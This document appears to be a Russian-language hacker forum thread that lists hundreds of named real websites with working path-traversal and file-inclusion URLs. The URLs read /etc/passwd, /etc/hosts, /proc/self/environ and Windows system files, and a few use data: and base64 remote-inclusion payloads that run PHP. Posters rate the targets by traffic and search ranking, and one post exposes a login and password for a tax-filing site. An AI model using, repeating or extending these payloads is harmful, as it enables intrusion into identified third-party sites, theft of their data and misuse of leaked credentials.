PHP Иньекции

Code:

http://www.proaxca.com/inc.php?inc=../../../../../../../etc/passwd%00

 

Code:

http://www.montesdelplata.com.uy/fotos.php?lang=../../../../../../../../../../etc/passwd%00.jpg&pagina=2

 

Code:

http://www.fieldit.co.uk/index.php?page=../../../../../../../../../etc/passwd%00

Code:

http://www.kruta.ee/main.php?lang=rus&pg=3&sp=../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

 

Code:

http://www.fotooleg.ru/page.php?id=.../../../../../../../../../../etc/passwd%00

 

Code:

http://www.tracegps.com/index.php?func=carte&langue=../../../../../../../../proc/self/status%00

Code:

http://www.boqueria.info/index.php?lang=../../../../../../../../proc/self/status/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

 

Сеть электронных торговых площадок [ЭЦП]

http://www.ieservice.ru/ViewForms/File.ashx?id=../../../../../../../../../../windows/win.ini
http://www.ieservice.ru/ViewForms/File.ashx?id=../Reductions.aspx
P.S Всего объявлено 5940 аукционов на общую сумму 12 381 685 985 руб.

 

http://zvezdaspb.ru/index.php?page=2&razd=.htaccess

 

Code:

http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd

 

Инклюд есть, но не могу обрезать окончание.

 

RFI

Code:

http://academy.tomsk.ru/?page=data:,%3C%3fphp%20phpinfo();%20?%3E

 

Code:

http://www.pionerplus.ru/edu/index.php?id=avtoriz/../../../../../../../../../proc/self/cmdline%00%27

http://fx-autotrade.ru/auction_details.php?id=../../../../../../../proc/self/status%00%27

 

LFI

Code:

http://www.3ok.pl/aktualnosci.php?plik=../../../../../../../../../etc/passwd
http://www.bcpo.net/go.php?display_id=25&content=C:\windows\system32\drivers\etc\hosts
http://www.daybyday.org/devotional.php?/etc/passwd
http://www.c114.com/c114/index3.htm?body=../../../../../../../../../etc/passwd
http://fermer.by/library.php?id=2&art=../../../../../etc/passwd%00
http://www.cybertecturemirror.com/main.php?id=/../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././.
http://www.energiepark-druiberg.de/index.php?id=/../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././.
http://astarta-tur.dn.ua/index.php?p=2&pg=3/../../../../../../../../../../../etc/hosts/./././././././././././././././[....]/./././././././././././.
http://topframe.ru/services.php?page=../../../../../../../../etc/passwd%00
http://www.marcellealix.com/index.php?page=/../../../../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././././.
http://a2zexpress.com.my/index.php?page=C:\windows\system32\drivers\etc\hosts
http://www.cvo-crescendo.be/page.php?FILE=../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.mijstegels.nl/index.php?file=../../../../../../etc/passwd
http://neodemos.it/index.php?file=/../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://phoenixhumanservices.org/index.php?page=/../../../../../../../../../../etc/passwd
http://www.cave-joly.ch/index.php?page=../etc/passwd%00
http://rplfrance.org/index.php?content=/etc/passwd
http://www.clarksdalenow.org/view.php?arc=&viewfile=/etc/passwd
http://www.w-castle.net/sub-main.php?leftfile=inc/left_food05.html&contentfile=/etc/hosts
http://arch.slidingonthecheap.com//co/archive/oldtop.php?link=/etc/passwd
http://www.lightwarrior.ru/csl.php?name=../../../../../../../../../../../../etc/passwd
http://www.zvuk.uu.ru/catalog/article.php?file=../../../../../../../../../../etc/passwd
http://www.xenosystem.com/t2.php?id=/etc/passwd
http://www.abei.it/index.php?file=/etc/passwd&sezione=Assemblea%202014&menu=Convocazione%20del%2025.06.2014
http://www.gaspforair.org/gasp/ordinance/ordinance_detail.php?fl=../../../../../../../../etc/passwd
http://www.shopiran.co.uk/index.php?page=/etc/passwd
http://www.ihcun.org/ihc/news/zh-cn/news.php?Title=/etc/passwd
http://extranet.ices.fr/PA_international.php?doc=/etc/passwd
http://www.cebesms.com/as.php?sayfa=C:\windows\system32\drivers\etc\hosts
http://www.anteny.katowice.pl/lupa1.php?tytul=TELEWIZJA%20NA%20KARTE&plik=../../../../../../../etc/passwd
http://www.diseni.com/cijara/0makina.php?censuphtm=/etc/hosts
http://ethiopianconsla.org/ConsularServicesAM/ConsularService.php?Page=C:\windows\system32\drivers\etc\hosts
http://extranet.ices.fr/PA_international.php?doc=/etc/passwd
http://rmph.lbi.ro/2013/index.php?id=/../../../../../../../etc/passwd%00
http://gk-adept.ru/index.php?id=index&id1=index&id3=../../../../../../../../../etc/passwd%00
http://www.trigun.it/2/home3.php?id=C:\windows\system.ini
http://www.e-tentes.gr/products.php?p=297&c=15&se&pg=4&l=2/../../../../../../../../../../../etc/hosts/./././././././././././././././[....]/./././././././././././.
http://www.belaplast.by/stati.php?page=../../../../../../..//etc/passwd/./././././././././././././././[....]/./././././././././././.
http://www.deloros-kbr.ru/index.php?Page=../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././././.
http://kovalyk.com.ua/index.php?page=../../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././././.
http://onedayparty.ru/afisha.php?page=../../../../../../etc/passwd%00
http://floordomain.com/gallery.php?page=/proc/self/environ
http://chemmanurcredits.com/index.php?page=../../../../../../../../../../../etc/hosts//./././././././././././././././[....]././././././././././././
http://www.tentuinstelling.be/index.php?page=../../../../../../../../../../../../etc/passwd
http://www.nerjacenter.com/?2-BR-Apartment-for-sale-in-Almu%F1ecar&lang=swe/../../../../../../../../etc/hosts/./././././././././././././././[....]/./././././././././././.
http://www.spielbyweb.com/games.php?lang=/../../../../../../../../proc/self/status/./././././././././././././././[....]/./././././././././././.
http://www.kepri.com/tripsignup.php?lang=/.././.././.././.././.././.././.././.././.././../etc/passwd%00&category=&tripId=105
http://www.friedrich-von-schiller.com/main.php?nav=eiskeller&lang=deDas/../../../../../../../../proc/self/status/./././././././././././././././[....]/././././././././././.
http://www.theosvillage.gr/photogallery.php?lang=../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././.
http://www.barcares-loueurs.com/who.php?lang=/../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././.
http://www.askco.fr/index.php?lang=../../../../../../../etc/passwd%00
http://www.bermacorporate.com/?lang=it/../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././.
http://roomy-tv.com/SelectChannels.php?ChannelCountry=Albania&HeadTitle=Albania&Lang=../../../../../../../../../../etc/passwd%00
http://www.bbg.org.bd/gallery_viewer.php?file=etc/passwd
http://www.cowtownguitars.com/itemtest2.php?invno=gsh51&itemtop=/etc/passwd
http://grekokatolicy-baniemazurskie.pl/index/main_pl.php?plik=/etc/passwd
http://www.borgoallegro.it/borgo/serate.php?link=../../../../../../../../../etc/hosts
http://www.lafamiglia.se/tidigare-kunder.php?inkludera=../../../../../../../../../etc/passwd
http://www.kashti.com/bul/index.php?k=tmp/../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/./././././././././
http://virtuafighter.com/view.php?section=vf4&file=../../../../../../../../../etc/passwd
http://www.insights-me.com/index.php?id=100001&item=gcc&file=../../../../../../../../../etc/passwd
http://www.playtimesports.nf.net/AvalonEast/news_read.php?fname=../../../../../../../etc/passwd
http://www.chebapparat.ru/dox.php?file=../../../../../../../../../etc/hosts
http://vrmz.org/showruk.php?file=../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://wisataagroinkarla.com/fasilitas.php?file=/proc/self/status
http://www.genetaver.com/main.php?pg_ref=/etc/passwd
http://www.nd-chretiente.com/index-site.php?file=qw/../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.pitcherflaccomio.com/new/index.php?file=../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.steinbeckequine.com/NewWebsite/IndexServiceDisplay.php?file=./.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd
http://www.pravasiexpress.com/index.php?file=/etc/passwd
http://www.centrotradizioneorale.net/iframe.php?file=/etc/hosts
https://www.cgsun.co.kr:6001/niabbs2/inc.php?inc=sub1-2/../../../../../../../../../etc/group%00
http://www.biodm.ru/katalog/bio.php?n=2&p=5&z=3/../../../../../../../etc/passwd%00
http://www.ecocopy.ru/catalog/cat.php?n=4../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://ibiw.ru/index.php?p=news&lang=../../../../../../etc/passwd%00
http://registr47.ru/index.php?pages=news&lang=text_ru&id_nws=../../../../../../../etc/passwd%00
http://www.herion-systemtechnik.de/index.php?lang=q/../../../../../../../../../../etc/hosts/./././././././././././././././[....]/././././././././././
http://www.alltrack.ch/outdoor/index.php?id=/etc/passwd
http://www.businessnewsforkids.com/volume.php?id=/etc/passwd
http://www.filllpg.co.uk/index.php?page=/../../../../../../../../../etc/passwd
http://www.gccc.gov.bd/index.php?page=/../../../../../../../../../etc/passwd
http://www.provideoproductions.com/index.php?page=/../../../../../../../../../etc/passwd
http://www.qcivalves.com/index.php?page=/proc/self/environ
http://www.saskpension.com/index.php?page=C:\windows\system.ini
http://www.txregionalcouncil.org/display.php?page=/etc/passwd
http://dkspeedruns.com/DK64/dk64.php?page=C:\windows\system.ini
http://www.basegroup.su/index.php?Page=/../../../../../../../../../etc/passwd
http://www.mel-tour.com/english/index.php?page=/../../../../../../../../../etc/passwd
http://www.pontecultura.co.uk/en/index.php?page=/etc/hosts
http://www.gogaspe.com/index_en.php?page=php/../../../../../../../etc/hosts
http://www.prodarom.com/anglais/gip/index_gip.php?page=/etc/hosts
http://brelect.fr/index.php?page=/etc/hosts
http://www.takojt.com/index.php?tpl=/../../../../../../../../../../../../../../etc/hosts//./././././././././././././././[....]./././././././././././
http://progalva.net/index.php?tpl=/../../../.././../../../.././../../../.././../../../.././../../../..//etc/hosts//./././././././././././././././[....]./././././././././././
http://www.pionerplus.ru/edu/index.php?id=/../../../../../../../../../../etc/passwd%00
http://www.mtpfish.ru/product/product_e.php?p=/proc/self/status
http://www.eurotrading.sk/index.php?page=/etc/hosts
http://www.gloucestercitybowlsclub.co.uk/competitive_games/county_league/index.php?team=B&opponents=../../../../../../../../../../etc/hosts
http://www.lwrm.org.uk/readthebible_new.php?word_doc=/proc/self/status&todaysDate=
http://ieet.dyu.edu.tw/ieet_new/try2.php?page=/etc/passwd
http://tayyar-intishar.org/index.php?content=/etc/hosts
http://www.swi.tu1.ru/index.php?content=/etc/passwd
http://www.digisoft.go.it/nuovo_lavoro/testo.php?testo=/etc/hosts
http://test.medvenka-crb.ru/Info.php?Reg=../../../../../../../../../../../etc/passwd%00
http://www.p-pp.com.ua/index.php?page=../../../../../../../../../../../../etc/passwd//./././././././././././././././[....]./././.
http://ergo-hestia.eu/zdrowieizycie.php?page=../../../../../../../../etc/passwd
http://www.luxtrading.sk/en/ld/Default.php?page=/etc/passwd
http://brucetonmills.us/index.php?page=/proc/self/status
http://www.emoto-peace-project.com/en/dr-emotos-message/artikel/?seite=left-2.html&artikel=/../../../../../../../../../etc/passwd
http://giperesvet.hut4.ru/index.php?page=/etc/passwd
http://www.japm.org/index_main.php?main=/etc/passwd
http://www.profera-trasporti.it/sito/index.php?q=/etc/hosts
http://www.grandpalladium.com.br/index.php?acao=pg&url=/proc/self/status
http://www.titantour.se/page2.php?p=/etc/passwd
http://www.epsilon.com.pl/index.php?page=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://www.frey.com.pl/wilczak/index.php?wolfdog=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://www.psd-file.com/index.php?page=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://silivonchik.ru/show.php?lng=ru&file=../../../../../../../../../etc/passwd
http://monocap.pl/index.php?lang=../../../../../../../../../../../../../etc/passwd/./././././././././././././././[....]/././././././././././
http://www.johner.com/help.php/static.php?page=p/./.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././etc/hosts
http://www.druginfonet.com/testing/dfpcode/index.php?pageID=../../../../../../../../../../../windows/system32/drivers/etc/hosts
http://jpgraph.ru/index.php?sel=p/./.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././proc/self/status/./././././././././././././././[....]/././././././././././
http://techmeup.com.au/index.php?page=p/../../../../../../../../../proc/self/status%00

RFI

Code:

http://www.jonmichaelsmusic.com/live/lyrics/sdfkjsdfjksdfjkl.php?file=data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

 

cgi-ки светятся:

Code:

http://www.pereplet.ru/cgi/news.cgi/.html

ищем подходящее, и светится уже всё:

Code:

http://www.pereplet.ru/cgi/soros/readdb.cgi?f=/etc/passwd%00

CY 2500 + traff

 

не инъекция, но все же
https://www.besttaxfiler.com/login.php
[email protected]:123123
https://www.besttaxfiler.com/client..../../../../../../../../../../../../etc/passwd

 

Code:

http://ispconfig.hu/index.php?page=/proc/self/environ
http://www.eastwestopticians.com/?page=/proc/self/environ

http://www.inmolamaestra.com/Principal.php?pagina=/proc/self/environ

 

Code:

http://www.agrarnagazeta.com.ua/file.php?component=sys_media_doc&file=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

 

Тиц 8900
Pr 4
Траф ~ 20к

Code:

http://www.turizm.ru/visas/quickstore.cgi?page=../../../../../../etc/passwd%00

 

http://www.medisoftna.com/index.php?page=../etc/passwd

 

Ещё пучек

Code:

http://www.larute.se/index.php?page=../../../../../etc/passwd
http://www.fotoschule.ch/index.php?page=../../../../../etc/passwd
http://www.clarkwork.com/Nathan/index.php?page=../../../../../../etc/passwd
http://msap.centre-de-ressources.fr/partenaires/index.php?page=../../../../../etc/passwd
http://www.cieply-dotyk.pl/index.php?page=../../../../etc/passwd
http://www.torsdagsbowling.dk/index.php?page=../../../etc/passwd
http://www.treats-gelato.co.uk/index.php?page=../../../../etc/passwd
http://www.thermodirekt.com/cgi-bin/wrapper.php?req=index.php&nav=prod.php&page=../../../../etc/passwd
http://www.mrshadow.se/index.php?page=../../../../etc/passwd
http://www.royeres87.fr/index.php?page=../../../../../etc/passwd
http://www.cynthiabend.dgi.bz/index.php?contents=menu2&page=../../../../../../etc/passwd
http://www.theshedshop.com/shedshop2/index.php?page=../../../../../../etc/passwd
http://cwc.mwa.co.th/eng/index.php?page=../../../../../etc/passwd
http://www.fjallochfiske.se/index.php?page=../../../../../etc/passwd